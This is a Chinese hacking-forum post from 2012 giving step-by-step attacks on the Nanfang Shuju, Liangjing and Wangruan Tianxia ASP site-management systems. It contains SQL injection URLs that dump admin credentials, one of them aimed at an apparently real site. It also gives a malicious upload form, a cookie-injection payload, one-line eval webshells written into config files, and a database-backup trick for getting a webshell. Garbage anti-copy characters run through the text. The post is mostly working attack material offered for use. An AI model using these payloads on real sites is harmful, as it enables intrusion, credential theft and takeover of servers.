找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2321|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb
" [1 c9 t. I+ A3 @7 z) j1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
( V) W# C3 n$ @% \也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
+ Y' f+ S6 m. I+ B' E直接暴管理员帐号密码(md5)
' W2 m4 T* u) {! ^7 C& ~/ |2 D2.登陆后台
2 H; [0 ?& E' ^9 {5 [3.利用编辑器上传:; ~" f- `4 d  c: w( N8 o
访问admin/southidceditor/admin_style.asp
, u, r# F& d# U/ J: D; i( ]) P9 ^修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
! r) v" j6 P$ o% d; w, ]- I9 ]1 u8 p$ d+ \( a( `
========================================- A* C; G: S" g$ X# X

/ d8 B/ u/ h3 m! Q# M& {参考资料整理:
! u9 A* y* A( y% v0 r南方数据、良精系统、网软天下漏洞利用
) K1 i! d: a8 T8 |) Z2 v
: @, p0 o% g% R- A$ C4 q3 c( h% B1、通过upfile_other.asp漏洞文件直接取SHELL$ s2 ]9 j. u3 m! Q# m3 m
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
& j. r; p$ [: r$ X<HTML><HEAD>
* |3 `' t( {7 x! y<META http-equiv=Content-Type content="text/html; charset=gb2312">
8 _! v5 m) {) Y5 {" H8 l: s% i% A<STYLE type=text/css>BODY {
7 X! i4 k; P: f1 m- eFONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
4 v) }) \+ {7 n8 D- o) b}
8 ^2 P& D9 i7 S" `7 B.tx1 { / E- n# ]2 ~( N, W" l6 `% ~( R
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px 5 G3 }. B; ^6 m$ K! B: }+ U
}
4 }& o! }2 h+ j! L1 ^9 G</STYLE>
/ L& M( u# ~6 Z4 B8 o8 u5 y<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD> & t$ F; J+ d  K5 j
<BODY leftMargin=0 topMargin=0> & v" p. a/ g6 Q* x* ?
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post
" h6 Z# v; B: }7 E; eencType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> " e% g# y8 R* l* p: X" J) p5 q- u
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
0 I7 Z9 a& Z9 f0 X2 B& [5 Q- Z) F- ]
9 x( C. P3 z& {8 t将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。
# G) K. R; k5 [: ^注:此方法通杀南方数据、良精系统、网软天下等- r% `# S! h" ~% x4 F& _8 F

# d/ @! N8 z& T6 ?0 q9 ^& c5 C2、通过注入秒杀管理员帐号密码,使用如下:% a- F5 ~- u. l
http://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’
9 g' O4 j: K+ g# n) j1 R6 A8 v& N7 L以上代码直接暴管理员帐号和密码,取SHELL方法如下:3 @3 `8 ~: V: V2 M
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’- Z2 W) C. G  P. }: p0 n
成功把shell写入http://www.target.com/inc/config.asp
7 z' I3 F# O6 A" H2 `) [, P( m9 ]/ V2 B这里一句话chr(32)密码是“#”% I  @+ t! z  T1 V! T: P1 w
3、cookie注入4 J) H* L& f) G3 h
清空地址栏,利用union语句来注入,提交:3 s3 d  v3 `% X" G, x+ u: j8 [& W$ ^
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin")): m2 ]6 r4 c. }7 g# t+ r) o3 P
如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
3 }7 ]3 z5 b- {; }注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
( i! [2 v$ t0 ]! C(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)- N% s  \( _( F" d- o7 z

0 B; n. a3 E2 K; O8 }9 `三、后台取SHELL方法总结9 m! a/ g# S3 B  q: |
(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:
$ U7 E% v- V/ ?8 J3 G6 P, i8 B然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,/ Q% E6 H! W: L0 C7 C
这时再打开一句话马的客户端,提交同样得到一个小马
$ e& F0 F! f, d1 d' F7 j(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)/ a4 c( O2 f6 g0 r" o
(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:
0 r0 A8 z# W' O' @5 oif fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
2 }, H8 T) q: Z% o$ y6 ~0 oEnableUpload=false
! g2 b- b9 R8 b4 g1 Y
8 @/ z8 X- ]) V% O8 send if
, w1 o0 d. L3 \2 Y0 v6 iif EnableUpload=false then
4 M% K( w# H5 D$ W$ ~) Y3 @0 Wmsg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType7 T/ ^# T$ }+ b! F
FoundErr=true+ D- Q+ V! w7 y5 \6 g  |/ a
end if
  h- k% a* l! J* ^8 N! A大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:
/ }- I6 F9 P/ M$ ^提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)" {4 H; s& l* S& W8 W/ H  ]- d
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的
# Y8 l% v  |" {9 k8 N$ J) |9 w# i# m& M* R! ~- j5 ?$ A3 j/ ]; {
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的
1 u% g( O5 F3 B. r/ _直接访问备份后的地址,就得到一个webshell
  l& S" u1 V( e$ {2 i' I& S(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表